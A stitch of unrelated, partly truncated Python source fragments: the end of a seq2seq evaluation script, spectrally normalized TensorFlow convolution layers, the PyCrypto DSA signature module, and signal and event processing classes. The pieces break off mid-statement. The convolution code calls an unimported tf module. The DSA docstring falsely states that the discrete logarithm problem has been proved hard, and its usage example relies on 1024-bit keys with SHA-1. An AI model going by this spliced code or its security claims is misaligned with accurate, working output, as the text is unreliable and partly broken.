,' '.join(subtoken2token(tokens_roles[1][i]))]) + '\n')
else:
print('debug eva input:')
print('feed_source={}'.format(feed_source))
print('feed_targets={}'.format(feed_targets))
print('feed_encoder_mask={}'.format(feed_encoder_mask))
print('feed_decoder_masks={}'.format(feed_decoder_masks))
print('feed_lm_labels={}'.format(feed_lm_labels))
outputs = model(
feed_source,
feed_targets,
encoder_attention_mask=feed_encoder_mask,
decoder_attention_mask=feed_decoder_masks,
decoder_lm_labels=feed_lm_labels,
#fdebug=fdebug,
)
ans_seqs=[[],[]]
for i in range(len(model.decoders)):
print(outputs[i][1].size())
predicted_scores=outputs[i][1].argmax(-1).cpu().numpy().tolist()
for idx in predicted_scores:
tokens = []
for id in idx:
tokens.append(tokenizer.ids_to_tokens.get(id, tokenizer.unk_token))
ans_seqs[i].append(tokens)
for i in range(len(ans_seqs[0])):
fout.write('\t'.join([' '.join(ans_seqs[0][i]),' '.join(ans_seqs[1][i])]) + '\n')
# print('debug by zhuoyu, predicted_scores size={}'.format(predicted_scores.size()))
#eval_loss += lm_loss.mean().item()
nb_eval_steps += 1
eval_loss = eval_loss / nb_eval_steps
perplexity = torch.exp(torch.tensor(eval_loss))
result = {"perplexity": perplexity}
# Save the evaluation's results
output_eval_file = os.path.join(args.output_dir, "eval_results.txt")
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
with open(output_eval_file, "w") as writer:
logger.info("***** Eval results {} *****".format(prefix))
for key in sorted(result.keys()):
logger.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
#with open(os.path.join(args.output_dir,"dev.res"),'w',encoding='utf-8') as fout:
fout.flush()
fout.close()
fdebug.flush()
fdebug.close()
return result
def main():
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument(
"--data_dir",
default=None,
type=str,
required=True,
help="The input training data file (a text file).",
)
parser.add_argument(
"--output_dir",
default=None,
type=str,
required=True,
help="The output directory where the model predictions and checkpoints will be written.",
)
# Optional parameters
parser.add_argument(
"--gradient_accumulation_steps",
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.",
)
parser.add_argument(
"--do_evaluate",
type=bool,
default=False,
help="Run model evaluation on out-of-sample data.",
)
parser.add_argument("--do_train", type=bool, default=False, help="Run training.")
parser.add_argument(
"--do_overwrite_output_dir",
type=bool,
default=False,
help="Whether to overwrite the output dir.",
)
parser.add_argument(
"--encoder_model_name_or_path",
default="bert-base-cased",
type=str,
help="The model checkpoint to initialize the encoder's weights with.",
)
parser.add_argument(
"--decoder_model_name_or_path",
default="/data/zhuoyu/semantic_parsing/models",
type=str,
help="The model checkpoint to initialize the decoder's weights with.",
)
parser.add_argument(
"--model_type",
default="bert",
type=str,
help="The decoder architecture to be fine-tuned.",
)
parser.add_argument(
"--max_grad_norm", default=1.0, type=float, help="Max gradient norm."
)
parser.add_argument(
"--max_steps",
default=-1,
type=int,
help="If > 0: set total number of training steps to perform. Override num_train_epochs.",
)
parser.add_argument(
"--to_cpu", default=False, type=bool, help="Whether to force | |
#!/usr/bin/env python
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn
from tensorflow.python.eager import context
from tensorflow.python.layers import utils
from tensorflow.python.layers import convolutional as tf_convolutional_layers
from tensorflow.python.util.tf_export import tf_export
from tensorflow.keras import activations
from tensorflow.keras import backend as K
from tensorflow.keras import constraints
from tensorflow.keras import initializers
from tensorflow.keras import regularizers
from tensorflow.keras.layers import Layer
from tensorflow.python.layers import core
from tensorflow.python.framework import ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import gen_math_ops
def _l2normalizer(v, epsilon=1e-12):
return v / (K.sum(v ** 2) ** 0.5 + epsilon)
def power_iteration(W, u, rounds=1):
"""
Accroding the paper, we only need to do power iteration one time.
"""
_u = u
for i in range(rounds):
_v = _l2normalizer(K.dot(_u, W))
_u = _l2normalizer(K.dot(_v, K.transpose(W)))
W_sn = K.sum(K.dot(_u, W) * _v)
return W_sn, _u, _v
@tf_export('keras.layers.Conv2D', 'keras.layers.Convolution2D')
class Conv2D(tf_convolutional_layers.Conv2D, Layer):
"""2D convolution layer (e.g. spatial convolution over images).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of
outputs. If `use_bias` is True,
a bias vector is created and added to the outputs. Finally, if
`activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation")..
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
4D tensor with shape:
`(samples, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(samples, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
spectral_normalization=True,
bias_constraint=None,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(Conv2D, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
tf.logging.fatal("CONV: Using Spectral Norm!")
self.u = K.random_normal_variable([1, filters], 0, 1, dtype=self.dtype, name="sn_estimate") # [1, out_channels]
self.spectral_normalization = spectral_normalization
def compute_spectral_normal(self, training=True):
# Spectrally Normalized Weight
if self.spectral_normalization:
# Get kernel tensor shape [kernel_h, kernel_w, in_channels, out_channels]
W_shape = self.kernel.shape.as_list()
# Flatten the Tensor
W_mat = K.reshape(self.kernel, [W_shape[-1], -1]) # [out_channels, N]
W_sn, u, v = power_iteration(W_mat, self.u)
if training:
# Update estimated 1st singular vector
self.u.assign(u)
return self.kernel / W_sn
else:
return self.kernel
def call(self, inputs, training=None):
outputs = K.conv2d(
inputs,
self.compute_spectral_normal(training),
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate)
if self.bias is not None:
outputs = K.bias_add(
outputs,
self.bias,
data_format=self.data_format)
if self.activation is not None:
return self.activation(outputs)
return outputs
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(Conv2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
@tf_export('keras.layers.Conv2DTranspose',
'keras.layers.Convolution2DTranspose')
class Conv2DTranspose(tf_convolutional_layers.Conv2DTranspose, Layer):
"""Transposed convolution layer (sometimes called Deconvolution).
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation")..
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
4D tensor with shape:
`(batch, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(batch, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
spectral_normalization=True,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(Conv2DTranspose, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
self.spectral_normalization = | |
<gh_stars>0
# -*- coding: utf-8 -*-
#
# PublicKey/DSA.py : DSA signature primitive
#
# Written in 2008 by <NAME> <<EMAIL>>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""DSA public-key signature algorithm.
DSA_ is a widespread public-key signature algorithm. Its security is
based on the discrete logarithm problem (DLP_). Given a cyclic
group, a generator *g*, and an element *h*, it is hard
to find an integer *x* such that *g^x = h*. The problem is believed
to be difficult, and it has been proved such (and therefore secure) for
more than 30 years.
The group is actually a sub-group over the integers modulo *p*, with *p* prime.
The sub-group order is *q*, which is prime too; it always holds that *(p-1)* is a multiple of *q*.
The cryptographic strength is linked to the magnitude of *p* and *q*.
The signer holds a value *x* (*0<x<q-1*) as private key, and its public
key (*y* where *y=g^x mod p*) is distributed.
In 2012, a sufficient size is deemed to be 2048 bits for *p* and 256 bits for *q*.
For more information, see the most recent ECRYPT_ report.
DSA is reasonably secure for new designs.
The algorithm can only be used for authentication (digital signature).
DSA cannot be used for confidentiality (encryption).
The values *(p,q,g)* are called *domain parameters*;
they are not sensitive but must be shared by both parties (the signer and the verifier).
Different signers can share the same domain parameters with no security
concerns.
The DSA signature is twice as big as the size of *q* (64 bytes if *q* is 256 bit
long).
This module provides facilities for generating new DSA keys and for constructing
them from known components. DSA keys allows you to perform basic signing and
verification.
>>> from Crypto.Random import random
>>> from Crypto.PublicKey import DSA
>>> from Crypto.Hash import SHA
>>>
>>> message = "Hello"
>>> key = DSA.generate(1024)
>>> h = SHA.new(message).digest()
>>> k = random.StrongRandom().randint(1,key.q-1)
>>> sig = key.sign(h,k)
>>> ...
>>> if key.verify(h,sig):
>>> print "OK"
>>> else:
>>> print "Incorrect signature"
.. _DSA: http://en.wikipedia.org/wiki/Digital_Signature_Algorithm
.. _DLP: http://www.cosic.esat.kuleuven.be/publications/talk-78.pdf
.. _ECRYPT: http://www.ecrypt.eu.org/documents/D.SPA.17.pdf
"""
__revision__ = "$Id$"
__all__ = ['generate', 'construct', 'error', 'DSAImplementation', '_DSAobj']
import sys
if sys.version_info[0] == 2 and sys.version_info[1] == 1:
from Crypto.Util.py21compat import *
from Crypto.PublicKey import _DSA, _slowmath, pubkey
from Crypto import Random
try:
from Crypto.PublicKey import _fastmath
except ImportError:
_fastmath = None
class _DSAobj(pubkey.pubkey):
"""Class defining an actual DSA key.
:undocumented: __getstate__, __setstate__, __repr__, __getattr__
"""
#: Dictionary of DSA parameters.
#:
#: A public key will only have the following entries:
#:
#: - **y**, the public key.
#: - **g**, the generator.
#: - **p**, the modulus.
#: - **q**, the order of the sub-group.
#:
#: A private key will also have:
#:
#: - **x**, the private key.
keydata = ['y', 'g', 'p', 'q', 'x']
def __init__(self, implementation, key):
self.implementation = implementation
self.key = key
def __getattr__(self, attrname):
if attrname in self.keydata:
# For backward compatibility, allow the user to get (not set) the
# DSA key parameters directly from this object.
return getattr(self.key, attrname)
else:
raise AttributeError("%s object has no %r attribute" % (self.__class__.__name__, attrname,))
def sign(self, M, K):
"""Sign a piece of data with DSA.
:Parameter M: The piece of data to sign with DSA. It may
not be longer in bit size than the sub-group order (*q*).
:Type M: byte string or long
:Parameter K: A secret number, chosen randomly in the closed
range *[1,q-1]*.
:Type K: long (recommended) or byte string (not recommended)
:attention: selection of *K* is crucial for security. Generating a
random number larger than *q* and taking the modulus by *q* is
**not** secure, since smaller values will occur more frequently.
Generating a random number systematically smaller than *q-1*
(e.g. *floor((q-1)/8)* random bytes) is also **not** secure. In general,
it shall not be possible for an attacker to know the value of `any
bit of K`__.
:attention: The number *K* shall not be reused for any other
operation and shall be discarded immediately.
:attention: M must be a digest cryptographic hash, otherwise
an attacker may mount an existential forgery attack.
:Return: A tuple with 2 longs.
.. __: http://www.di.ens.fr/~pnguyen/pub_NgSh00.htm
"""
return pubkey.pubkey.sign(self, M, K)
def verify(self, M, signature):
"""Verify the validity of a DSA signature.
:Parameter M: The expected message.
:Type M: byte string or long
:Parameter signature: The DSA signature to verify.
:Type signature: A tuple with 2 longs as return by `sign`
:Return: True if the signature is correct, False otherwise.
"""
return pubkey.pubkey.verify(self, M, signature)
def _encrypt(self, c, K):
raise TypeError("DSA cannot encrypt")
def _decrypt(self, c):
raise TypeError("DSA cannot decrypt")
def _blind(self, m, r):
raise TypeError("DSA cannot blind")
def _unblind(self, m, r):
raise TypeError("DSA cannot unblind")
def _sign(self, m, k):
return self.key._sign(m, k)
def _verify(self, m, sig):
(r, s) = sig
return self.key._verify(m, r, s)
def has_private(self):
return self.key.has_private()
def size(self):
return self.key.size()
def can_blind(self):
return False
def can_encrypt(self):
return False
def can_sign(self):
return True
def publickey(self):
return self.implementation.construct((self.key.y, self.key.g, self.key.p, self.key.q))
def __getstate__(self):
d = {}
for k in self.keydata:
try:
d[k] = getattr(self.key, k)
except AttributeError:
pass
return d
def __setstate__(self, d):
if not hasattr(self, 'implementation'):
self.implementation = DSAImplementation()
t = []
for k in self.keydata:
if not d.has_key(k):
break
t.append(d[k])
self.key = self.implementation._math.dsa_construct(*tuple(t))
def __repr__(self):
attrs = []
for k in self.keydata:
if k == 'p':
attrs.append("p(%d)" % (self.size()+1,))
elif hasattr(self.key, k):
attrs.append(k)
if self.has_private():
attrs.append("private")
# PY3K: This is meant to be text, do not change to bytes (data)
return "<%s @0x%x %s>" % (self.__class__.__name__, id(self), ",".join(attrs))
class DSAImplementation(object):
"""
A DSA key factory.
This class is only internally used to implement the methods of the
`Crypto.PublicKey.DSA` module.
"""
def __init__(self, **kwargs):
"""Create a new DSA key factory.
:Keywords:
use_fast_math : bool
Specify which mathematic library to use:
- *None* (default). Use fastest math available.
- *True* . Use fast math.
- *False* . Use slow math.
default_randfunc : callable
Specify how to collect random data:
- *None* (default). Use Random.new().read().
- not *None* . Use the specified function directly.
:Raise RuntimeError:
When **use_fast_math** =True but fast math is not available.
"""
use_fast_math = kwargs.get('use_fast_math', None)
if use_fast_math is None: # Automatic
if _fastmath is not None:
self._math = _fastmath
else:
self._math = _slowmath
elif use_fast_math: # Explicitly select fast math
if _fastmath is not None:
self._math = _fastmath
else:
raise RuntimeError("fast math module not available")
else: # Explicitly select slow math
self._math = _slowmath
self.error = self._math.error
# 'default_randfunc' parameter:
# None (default) - use Random.new().read
# not None - use the specified function
self._default_randfunc = kwargs.get('default_randfunc', None)
self._current_randfunc = None
def _get_randfunc(self, randfunc):
if randfunc is not None:
return randfunc
elif self._current_randfunc is None:
self._current_randfunc = Random.new().read
return self._current_randfunc
def generate(self, bits, randfunc=None, progress_func=None):
"""Randomly generate a fresh, new DSA key.
:Parameters:
bits : int
Key length, or size (in bits) of the DSA modulus
*p*.
It must be a multiple of 64, in the closed
interval [512,1024].
randfunc : callable
Random number generation function; it should accept
a single integer N and return a string of random data
N bytes long.
If not specified, a new one will be instantiated
from ``Crypto.Random``.
progress_func : callable
Optional function that will be called with a short string
containing the | |
from copy import copy
import pandas as pd
import numpy as np
from cached_property import cached_property
from hashlib import md5
from .utils import integral_trapz
from .core_utils import IdentifedObject, IdentifedCachedObject
# register signal name dictionary
global __signal_names__
__signal_names__ = {}
def get_signal_names():
"""
Access global signal name dictionary.
Returns
-------
global singal_name: dict
"""
return globals()['__signal_names__']
class CoreSingleSignal(IdentifedCachedObject):
def __init__(self, t: np.ndarray = None, y: np.ndarray = None, name: str = None, listed=True, **kwargs):
"""
core class for single signals
Parameters
----------
t: ndarray
time points
y: ndarray
Values corresponding to the time points t.
name: str or None, optional
Name for the signal that will be registrated in the global singal name dictionary if the parameter "listed"
is True. If None, a unique generic singal name will be generated.
listed: bool,
If True the signl will be registrated in the global singal name dictionary. Default is True.
"""
super(CoreSingleSignal, self).__init__(**kwargs)
self._y = None
self._t = None
self.register_cached_property('dydt')
self.register_cached_property('d2ydt2')
self.register_cached_property('integral')
self.register_cached_property('sign_change_y')
self.register_cached_property('sign_change_dydt')
self.register_cached_property('sign_change_d2ydt2')
self.set_y(y)
self.set_t(t)
self._name = self._gen_name(name)
if listed:
if self._name in __signal_names__:
if __signal_names__[self._name] != self.get_hash():
raise NameError('“{}“ already registered as different Signal!'.format(self._name))
else:
__signal_names__.update({self._name: self.get_hash()})
def __len__(self):
return len(self.y)
def _gen_name(self, name: str = None):
"""
Generate object name.
Parameters
----------
name: str or None
Custom object name.
Returns
-------
generated object name: str
"""
if name is None:
return '{}_{}'.format(self.__class__.__name__, self.__identifier__)
else:
return name
def get_hash(self):
"""
Get object hash value.
Returns
-------
hash value: str
"""
m = md5()
m.update("{0:s}-{1:s}-{2:s}-{3:s}".format(
str(self._t),
str(self._y),
str(self.__identifier__),
str(self.__creation_date__)
).encode())
return m.hexdigest()
def set_y(self, y: np.ndarray):
"""
Set signal values.
Parameters
----------
y: ndarray
"""
self.del_cache()
self._y = y
@property
def y(self):
"""
Returns
-------
signal values: ndarray
"""
return self._y
@y.setter
def y(self, value):
"""
Set signal values.
Parameters
----------
value: ndarray
"""
self.set_y(value)
def set_t(self, t: np.ndarray):
"""
Set signal time points.
Parameters
----------
t: ndarray
"""
self.del_cache()
self._t = t
@property
def t(self):
"""
Returns
-------
singal time points: ndarray
"""
return self._t
@t.setter
def t(self, value):
"""
Set signal time points.
Parameters
----------
t: ndarray
"""
self.set_t(value)
@property
def fs(self):
"""
Returns
-------
fs: float
"""
return np.median(1/np.diff(self.t))
@property
def name(self):
"""
Returns
-------
singal name: str
"""
return self._name
@property
def data(self):
"""
Returns
-------
data array [t, y]: ndarray
"""
return np.array((self.t, self.y)).T
def _time_derivate(self, data: np.ndarray):
"""
Calculate simple time derivate for data array.
Parameters
----------
data: ndarray
Returns
-------
time derivate: ndarray
"""
return np.array([0] + list(np.diff(data) / np.diff(self.t)))
@cached_property
def dydt(self):
"""
Calculate dy/dt. The values will be cached.
Returns
-------
dy/dt: ndarray
"""
return self._time_derivate(self.y)
@cached_property
def d2ydt2(self):
"""
Calculate d^2y/dt^2. The values will be cached.
Returns
-------
d^2y/dt^2: ndarray
"""
return self._time_derivate(self.dydt)
@cached_property
def integral(self):
"""
Calculate the intragral of the singal. The values will be cached.
Returns
-------
integral: float
"""
return integral_trapz(self.t, self.y)
@cached_property
def sign_change_y(self):
"""
Trigger sign change of y. The values will be cached.
Returns
-------
sign change trigger: ndarray
"""
return np.array([0] + list(np.diff(np.sign(self.y))))
@cached_property
def sign_change_dydt(self):
"""
Trigger sign change of dy/dt. The values will be cached.
Returns
-------
sign change trigger: ndarray
"""
return np.sign([0] + list(np.diff(np.sign(self.dydt))))
@cached_property
def sign_change_d2ydt2(self):
"""
Trigger sign change of d^2y/dt^2. The values will be cached.
Returns
-------
sign change trigger: ndarray
"""
return np.sign([0] + list(np.diff(np.sign(self.d2ydt2))))
def __getitem__(self, item):
config = self.get_config()
config['name'] = None
config['identifier'] = None
config['listed'] = False
return self.__class__(y=self.y[item], t=self.t[item], **config)
def export2csv(self, fname, delimiter='\t', header=['time', 'signal'], **kwargs):
"""
Export data to csv.
Parameters
----------
fname: str
File name of the created file.
delimiter: str, optional
Used delimiter. Default '\t'.
header: list, optional
List of column names.
"""
np.savetxt(fname, np.array([self.t, self.y]).T, delimiter=delimiter, header=delimiter.join(header), **kwargs)
def get_config(self):
"""
Get config of the object for serialization.
Returns
-------
object config: dict
"""
base_config = super(CoreSingleSignal, self).get_config()
config = {}
return dict(
list(base_config.items())
+ list(config.items()))
def __del__(self):
if self.name in __signal_names__:
del get_signal_names()[self.name]
class CoreEvent(CoreSingleSignal):
def __init__(self, data: CoreSingleSignal = None, t_start: float = None, t_end: float = None,
t_reference: float = None, y_reference: float = None, **kwargs):
super(CoreEvent, self).__init__(**kwargs)
self._t_reference = None
self._y_reference = None
self.register_cached_property('t_local')
self.register_cached_property('y_local')
self.register_cached_property('sign_change_y_local')
self._t_start = copy(t_start)
self._t_end = copy(t_end)
self._t_reference = copy(t_reference)
self._event_descriptors = ['integral', 'rising_time', 'recovery_time']
if data is None:
self._event_data = []
self.reference_time = t_reference
self.reference_value = y_reference if y_reference is not None else None
self.start_time = t_start
self.end_time = t_end
self.start_value = None
self.end_value = None
else:
if t_start is None:
id_start = 0
elif t_start < data.t[0]:
id_start = 0
else:
id_start = np.where(data.t <= t_start)[0][-1]
if t_end is None:
id_end = len(data.t) - 1
elif t_end > data.t[-1]:
id_end = len(data.t) - 1
else:
id_end = np.where(data.t >= t_end)[0][0]
cut_signal = copy(data[id_start:id_end + 1])
if t_reference is None:
t_reference = cut_signal.t[0]
for key in cut_signal._cached_properties:
if key in self._cached_properties:
for entry in cut_signal._cached_properties[key]:
if entry not in self._cached_properties[key]:
self._cached_properties[key].append(entry)
self.set_t(copy(cut_signal.t))
self.set_y(copy(cut_signal.y))
self._event_data = [] # have to be after data setting, because __setattr__
self.reference_time = t_reference
self.reference_value = y_reference if y_reference is not None else self.y[0]
self.start_time = self.t_local[0]
self.end_time = self.t_local[-1]
self.start_value = self.y_local[0]
self.end_value = self.y_local[-1]
@property
def reference_time(self):
return self._t_reference
@reference_time.setter
def reference_time(self, value):
self.del_cache()
self._t_reference = value
@property
def reference_value(self):
return self._y_reference
@reference_value.setter
def reference_value(self, value):
self.del_cache()
self._y_reference = value
@cached_property
def t_local(self):
return self.t - self.reference_time
@cached_property
def y_local(self):
return self.y - self.reference_value
@cached_property
def sign_change_y_local(self):
return np.array([0] + list(np.diff(np.sign(self.y_local))))
@property
def event_data(self):
return dict((key, self[key]) for key in self._event_data + self._event_descriptors)
def __getitem__(self, key):
if getattr(self, key, None) is not None:
return getattr(self, key)
else:
return np.NaN
def __setitem__(self, key, value):
if key in key in ['y', 't', 'dydt', 'd2ydt2', 'data', 'integral']: # \
# + list(self._cached_properties.keys()):
raise KeyError('{} is a predefined class element!'.format(key))
if key not in self._event_data:
self._event_data.append(key)
setattr(self, key, value)
def _set_item(self, key, value, add_to_event_data=False):
if add_to_event_data and key not in self._event_data:
self._event_data.append(key)
setattr(self, key, value)
def __setattr__(self, name, value):
def check_descriptors(name):
for cls in type(self).__mro__: # handle properties via descriptor check
if name in cls.__dict__:
yield cls.__dict__[name]
if '_event_data' in self.__dict__:
if name not in self._event_data and name[0] != '_': # hide keys starting with '_'
self._event_data.append(name)
possible_descriptors = list(check_descriptors(name))
if len(possible_descriptors) > 0:
possible_descriptors[-1].__set__(self, value)
else:
self.__dict__[name] = value
def __delitem__(self, key):
if '_event_data' in self.__dict__:
if key in self._event_data:
self._event_data.remove(key)
delattr(self, key)
def __delattr__(self, name):
if name in self._event_data:
self._event_data.remove(name)
if name in self.__dict__:
del self.__dict__[name]
else:
delattr(self, name)
def __contains__(self, key):
return key in self._event_data + self._event_descriptors
def __len__(self):
return len(self._t)
@property
def data(self):
return dict((key, getattr(self, key, np.NaN)) for key in self._event_data + self._event_descriptors)
def to_Series(self):
return pd.Series(self.data)
def __str__(self):
return str(self.data)
def get_config(self):
base_config = super(CoreEvent, self).get_config()
config = {
't_start': self._t_start,
't_end': self._t_end,
't_reference': self._t_reference
}
return dict(list(base_config.items()) + list(config.items()))
class CoreEventList(IdentifedCachedObject):
def __init__(self, *args, **kwargs):
super(CoreEventList, self).__init__(*args, **kwargs)
self.register_cached_property('_event_data')
self._event_list = []
# self._event_data = []
@cached_property
def _event_data(self):
event_data = set()
for event in self:
event_data.update(event._event_data)
event_data.update(event._event_descriptors)
return list(event_data)
def __len__(self):
return len(self._event_list)
def __iter__(self):
self._iter_n = 0
return self
def __next__(self):
if self._iter_n < len(self._event_list):
result = self._event_list[self._iter_n]
self._iter_n += 1
return result
else:
raise StopIteration
def __getitem__(self, item):
return list(map(lambda event: event[item], self._event_list))
def __getattr__(self, item):
if item in self._event_data:
return list(map(lambda event: event[item], self._event_list))
def __setitem__(self, key, value):
for event in self:
event[key] = value
def add_event(self, event: CoreEvent):
self.del_cache()
for key in event._event_data:
if key not in self._event_data:
self._event_data.append(key)
self._event_list.append(event)
def append(self, event: CoreEvent):
self.add_event(event)
def remove_event(self, event):
if isinstance(event, int):
del self._event_list[event]
elif isinstance(event, CoreEvent):
self._event_list.remove(event)
else:
raise TypeError('Value have to be Int or Event not {}'.format(event.__class__.__name__))
def remove(self, event: CoreEvent):
self.remove_event(event)
@property
def data(self):
data = {}
for key in self._event_data:
data.update({key: list(map(lambda event: event[key], self._event_list))})
return data
